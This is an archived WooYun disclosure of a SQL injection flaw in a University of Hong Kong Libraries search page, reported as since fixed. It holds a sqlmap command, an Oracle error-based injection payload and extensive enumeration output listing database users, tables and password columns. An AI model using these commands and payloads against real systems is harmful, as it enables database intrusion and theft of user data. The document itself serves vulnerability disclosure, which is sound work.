乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-10: 厂商已经确认,细节仅向厂商公开 2015-12-20: 细节向核心白帽子及相关领域专家公开 2015-12-21: 厂商已经修复漏洞并主动公开,细节向公众公开
The University of Hong Kong Libraries存在SQL注射漏洞(182W用户信息泄露)
地址:http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a
$ python sqlmap.py -u "http://**.**.**.**/ER/search.jsp?the_key=China+Biography&the_field=sb&the_lang=a" -p the_key --technique=E --output-dir=output --random-agent --batch --no-cast -D NDLC -T EJ_996 --columns
Database: NDLC+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| EJ_996 | 1820120 |
web application technology: JSPback-end DBMS: OracleDatabase: NDLCTable: EJ_996[17 columns]+--------------------+----------+| Column | Type |+--------------------+----------+| NO_USERS | VARCHAR2 || SUBFIELDZ_PASSWORD | VARCHAR2 || URL_PASSWORD | VARCHAR2 |+--------------------+----------+
---Parameter: the_key (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: the_key=China Biography'||(SELECT 'JUyI' FROM DUAL WHERE 4168=4168 AND 2419=CTXSYS.DRITHSX.SN(2419,(CHR(113)||CHR(112)||CHR(113)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2419=2419) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(107)||CHR(113))))||'&the_field=sb&the_lang=a---web application technology: JSPback-end DBMS: Oraclecurrent user: 'NDLC'current user is DBA: Falsedatabase management system users [60]:[*] ANONYMOUS[*] APEX_030200[*] APEX_PUBLIC_USER[*] APPQOSSYS[*] BASICLAW[*] BI[*] BRO[*] CTXSYS[*] DBSNMP[*] DIP[*] DWLOG[*] EXFSYS[*] FLOWS_FILES[*] FOTEST[*] HKOH[*] HKUTO[*] HONOUR[*] HR[*] HUBREAD[*] ICALADM[*] INNOFO[*] INNOPAC[*] ISFORM[*] IX[*] JETCO[*] LBIB[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] MISCTEST[*] NDLC[*] NDLCTEST[*] OE[*] OLAPSYS[*] ORACLE_OCM[*] ORDDATA[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] OWBSYS[*] OWBSYS_AUDIT[*] PM[*] RBR[*] REFFORM[*] RSCHK[*] SCHK[*] SCHK_STAFF[*] SCOTT[*] SH[*] SI_INFORMTN_SCHEMA[*] SPATIAL_CSW_ADMIN_USR[*] SPATIAL_WFS_ADMIN_USR[*] SRSADM[*] STATS[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB[*] XS$NULLDatabase: APEX_030200+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| WWV_FLOW_DUAL100 | 100 |+--------------------------------+---------+Database: SYSTEM+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| HELP | 919 |+--------------------------------+---------+Database: SYS+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| AW$AWMD | 728 || STMT_AUDIT_OPTION_MAP | 268 || SYSTEM_PRIVILEGE_MAP | 208 || AUDIT_ACTIONS | 177 || AW$AWXML | 137 || AW$EXPRESS | 101 || AW$AWCREATE | 51 || AW$AWCREATE10G | 27 || AW$AWREPORT | 27 || TABLE_PRIVILEGE_MAP | 26 || "DUAL" | 1 |+--------------------------------+---------+Database: MDSYS+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| SDO_COORD_OP_PARAM_VALS | 9736 || SDO_COORD_REF_SYS | 4426 || SDO_CS_SRS | 4426 || SDO_COORD_OPS | 2279 || SDO_COORD_OP_PARAM_USE | 718 || SDO_DATUMS | 535 || SDO_COORD_OP_PATHS | 365 || SDO_COORD_OP_PARAMS | 153 || SDO_COORD_AXES | 139 || SDO_UNITS_OF_MEASURE | 132 || SDO_DATUMS_OLD_SNAPSHOT | 118 || SDO_ELLIPSOIDS | 96 || SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT | 95 || SDO_COORD_OP_METHODS | 85 || SDO_COORD_SYS | 65 || SDO_ELLIPSOIDS_OLD_SNAPSHOT | 47 || SDO_PROJECTIONS_OLD_SNAPSHOT | 42 || SDO_COORD_AXIS_NAMES | 28 || SDO_PRIME_MERIDIANS | 16 || SDO_XML_SCHEMAS | 3 || SDO_GEOR_XMLSCHEMA_TABLE | 1 |+--------------------------------+---------+Database: NDLC+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| DR$NDLC_INDEX$I | 7103205 || BIB_SUBJ | 2012382 || EJ_996 | 1820120 || BIB_TYPE | 1672433 || TITLE | 1669310 || DR$NDLC_INDEX$K | 1282960 || TMP_BIB | 1196192 || FULLTITLE | 571664 || DR$NDLC_INDEX$N | 177446 || COMPLETELIST_AGGR | 40726 || TMP_DEL_REC | 19944 || CORE | 1154 || SUBJECT_DDC | 1013 || TC | 499 || LANG | 375 || SUBJECT | 131 || KEYDB | 101 || EJ_991 | 89 || LOCATION | 50 || DB_SUBJECT | 49 || TYPE | 48 || TYPE_COUNT | 33 || CAT | 28 || DR$NDLC_INDEX$R | 22 || BROAD_SUBJECT | 10 || NOTES | 9 || SUBJECT_GP | 9 |+--------------------------------+---------+Database: HKUTO+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| LANG | 375 |+--------------------------------+---------+Database: CTXSYS+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| DR$OBJECT_ATTRIBUTE | 480 || DR$NUMBER_SEQUENCE | 256 |+--------------------------------+---------+columns LIKE 'PASS' were found in the following databases:Database: SYSTable: KU$_PROFILE_VIEW[1 column]+----------------+----------+| Column | Type |+----------------+----------+| PASS_FUNC_NAME | VARCHAR2 |+----------------+----------+Database: SYSTable: EXU9LNKU[2 columns]+-------------+----------+| Column | Type |+-------------+----------+| AUTH_PASSWD | VARCHAR2 || PASSWD | VARCHAR2 |+-------------+----------+Database: SYSTable: KU$_ROLE_VIEW[1 column]+----------+----------+| Column | Type |+----------+----------+| PASSWORD | VARCHAR2 |+----------+----------+Database: SYSTable: ALL_SQLSET_PLANS[3 columns]+------------------------+--------+| Column | Type |+------------------------+--------+| ESTIMATED_ONEPASS_SIZE | NUMBER || MULTIPASSES_EXECUTIONS | NUMBER || ONEPASS_EXECUTIONS | NUMBER |+------------------------+--------+Database: SYSTable: EXU8LNKU[1 column]+--------+----------+| Column | Type |+--------+----------+| PASSWD | VARCHAR2 |+--------+----------+Database: SYSTable: KU$_USER_VIEW[1 column]+----------+----------+| Column | Type |+----------+----------+| PASSWORD | VARCHAR2 |+----------+----------+Database: SYSTable: KU$_DBLINK_VIEW[2 columns]+-----------+----------+| Column | Type |+-----------+----------+| PASSWORD | VARCHAR2 || PASSWORDX | RAW |+-----------+----------+Database: SYSTable: KU$_10_1_DBLINK_VIEW[2 columns]+-----------+----------+| Column | Type |+-----------+----------+| PASSWORD | VARCHAR2 || PASSWORDX | RAW |+-----------+----------+Database: SYSTable: USER_DB_LINKS[1 column]+----------+----------+| Column | Type |+----------+----------+| PASSWORD | VARCHAR2 |+----------+----------+Database: SYSTable: EXU10LNKU[4 columns]+--------------+----------+| Column | Type |+--------------+----------+| AUTH_PASSWD | VARCHAR2 || AUTH_PASSWDX | RAW || PASSWD | VARCHAR2 || PASSWDX | RAW |+--------------+----------+Database: SYSTable: EXU8USRU[1 column]+--------+----------+| Column | Type |+--------+----------+| PASSWD | VARCHAR2 |+--------+----------+Database: SYSTable: USER_SQLSET_PLANS[3 columns]+------------------------+--------+| Column | Type |+------------------------+--------+| ESTIMATED_ONEPASS_SIZE | NUMBER || MULTIPASSES_EXECUTIONS | NUMBER || ONEPASS_EXECUTIONS | NUMBER |+------------------------+--------+Database: APEX_030200Table: WWV_FLOW_USERS[6 columns]+------------------------------+----------+| Column | Type |+------------------------------+----------+| CHANGE_PASSWORD_ON_FIRST_USE | VARCHAR2 || FIRST_PASSWORD_USE_OCCURRED | VARCHAR2 || PASSWORD_ACCESSES_LEFT | NUMBER || PASSWORD_DATE | DATE || PASSWORD_LIFESPAN_ACCESSES | NUMBER || PASSWORD_LIFESPAN_DAYS | NUMBER |+------------------------------+----------+Database: NDLCTable: EJ_996[2 columns]+--------------------+----------+| Column | Type |+--------------------+----------+| SUBFIELDZ_PASSWORD | VARCHAR2 || URL_PASSWORD | VARCHAR2 |+--------------------+----------+
web application technology: JSPback-end DBMS: OracleDatabase: NDLCTable: EJ_996[17 columns]+--------------------+----------+| Column | Type |+--------------------+----------+| BIB | NUMBER || COVERAGE | VARCHAR2 || FORMAT | VARCHAR2 || IP_FILTER | VARCHAR2 || LOCATION | VARCHAR2 || MEGACD | VARCHAR2 || NO_USERS | VARCHAR2 || NOTES | CHAR || NOTES_URL | VARCHAR2 || SUBFIELD_Z | VARCHAR2 || SUBFIELDZ_OTHERS | VARCHAR2 || SUBFIELDZ_PASSWORD | VARCHAR2 || URL | VARCHAR2 || URL_OTHERS | VARCHAR2 || URL_PASSWORD | VARCHAR2 || VIA | VARCHAR2 || WF | NUMBER |+--------------------+----------+
上WAF。
危害等级:高
漏洞Rank:14
确认时间:2015-12-10 17:01
已將事件通知有關機構
2015-12-21:相關機構回報已修復漏洞